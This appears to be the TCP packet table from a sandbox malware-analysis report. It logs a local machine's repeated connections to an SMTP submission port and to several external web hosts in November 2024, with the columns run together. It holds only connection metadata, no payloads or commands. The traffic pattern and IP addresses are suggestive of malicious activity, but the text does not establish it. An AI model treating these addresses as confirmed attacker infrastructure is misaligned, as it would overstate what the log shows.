                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813477993 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.813507080 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.934885025 CET804986782.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:13.935226917 CET804986782.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.420069933 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.421716928 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.460916996 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.460990906 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.461034060 CET4981480192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.477787971 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.543627024 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.581001043 CET804981482.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.597738028 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600244045 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600614071 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.600627899 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.720550060 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.720712900 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.843146086 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.843337059 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:14.964976072 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.261038065 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.261497021 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.383008957 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680841923 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680923939 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680942059 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.680983067 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.682689905 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:15.802634954 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.097269058 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.098226070 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.220623016 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.510797977 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.511070967 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.630983114 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.923451900 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:16.923718929 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.043679953 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.342530966 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.342761040 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.463016987 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.755736113 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.756134033 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:17.876084089 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.173388004 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.177989006 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.298264980 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.590992928 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616715908 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616797924 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616822958 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.616987944 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.621020079 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.621114969 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.621162891 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.621220112 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.621220112 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.621270895 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.736716032 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.736728907 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.736743927 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.736882925 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.740962982 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.741100073 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.741120100 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.741199970 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.741210938 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:18.741261005 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:19.120348930 CET5874986651.195.88.199192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:19.168917894 CET49866587192.168.2.1051.195.88.199
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.576759100 CET4986780192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.601102114 CET4990980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.721018076 CET804990982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.721112967 CET4990980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.721420050 CET4990980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.723139048 CET4990980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.841362953 CET804990982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:32.843120098 CET804990982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:36.533008099 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:36.533118010 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:36.690943956 CET4987180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:36.810903072 CET804987182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.804949045 CET4992180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.924957037 CET804992182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.925050974 CET4992180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.925230026 CET4992180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:37.925251961 CET4992180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:38.045167923 CET804992182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:38.045176983 CET804992182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:54.648881912 CET804990982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:54.648947954 CET4990980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:54.648991108 CET4990980192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:54.768847942 CET804990982.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.006927967 CET4996080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.126842976 CET804996082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.126931906 CET4996080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.127099991 CET4996080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.127124071 CET4996080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.247042894 CET804996082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:55.247056961 CET804996082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:59.893661022 CET804992182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:59.893758059 CET4992180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:13:59.893809080 CET4992180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.013829947 CET804992182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.216770887 CET4997280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.336672068 CET804997282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.336950064 CET4997280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.562738895 CET4997280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.562786102 CET4997280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.682853937 CET804997282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:00.682873964 CET804997282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.040219069 CET804996082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.040287018 CET4996080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.061276913 CET4996080192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.123064041 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.181277037 CET804996082.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.243257999 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.243405104 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.243869066 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.243946075 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.363857985 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:17.363892078 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:22.268115997 CET804997282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:22.269248962 CET4997280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:22.269464970 CET4997280192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:22.389460087 CET804997282.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.272507906 CET5000980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.392509937 CET805000947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.392637014 CET5000980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.392894030 CET5000980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.392915010 CET5000980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.512864113 CET805000947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:23.512880087 CET805000947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.542898893 CET805000947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.542995930 CET805000947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.543075085 CET5000980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.543339968 CET5000980192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:25.663294077 CET805000947.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.283835888 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.404005051 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.404095888 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.406873941 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.406913042 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.526957035 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:26.526968956 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506834984 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506942034 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.506995916 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.507039070 CET5001080192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:28.627088070 CET805001013.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.259653091 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.379697084 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.379817963 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.380004883 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.380026102 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.500049114 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:29.500092983 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529479980 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529511929 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529650927 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.529733896 CET5001180192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:30.651294947 CET805001144.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.393881083 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.513914108 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514044046 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514348030 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.514395952 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.634279013 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:31.634345055 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633343935 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633388042 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633508921 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.633549929 CET5001280192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:33.754807949 CET805001218.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.012466908 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.132673025 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.132925987 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.133096933 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.133124113 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.252984047 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:35.253011942 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.303225040 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.303309917 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.303369045 CET5001380192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.335805893 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.423448086 CET8050013172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.455883980 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456005096 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456195116 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.456231117 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.576458931 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:36.576476097 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.632416964 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.632517099 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.633040905 CET5001480192.168.2.10172.234.222.138
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:37.753843069 CET8050014172.234.222.138192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.218116999 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.338105917 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.338403940 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.353823900 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.353823900 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.474173069 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:38.474211931 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.237113953 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.237195015 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.237320900 CET5000180192.168.2.1082.112.184.197
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.357270956 CET805000182.112.184.197192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.445760965 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.568036079 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.568237066 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.569245100 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.569339037 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.690512896 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.690525055 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.765475988 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.765511036 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.765609980 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.766093969 CET5001580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:39.886219978 CET805001534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.322447062 CET5001780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.442652941 CET805001718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.443042040 CET5001780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.443382025 CET5001780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.443382025 CET5001780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.563389063 CET805001718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:40.563406944 CET805001718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.603873968 CET805001718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.603940010 CET805001718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.604039907 CET5001780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.612312078 CET5001780192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:41.732453108 CET805001718.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.204216957 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.204278946 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.204375982 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.204508066 CET5001680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.324768066 CET805001647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.371768951 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.491779089 CET805001813.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.491892099 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.492192984 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.492223024 CET5001880192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                    Nov 26, 2024 08:14:42.521037102 CET5001980192.168.2.10208.100.26.245
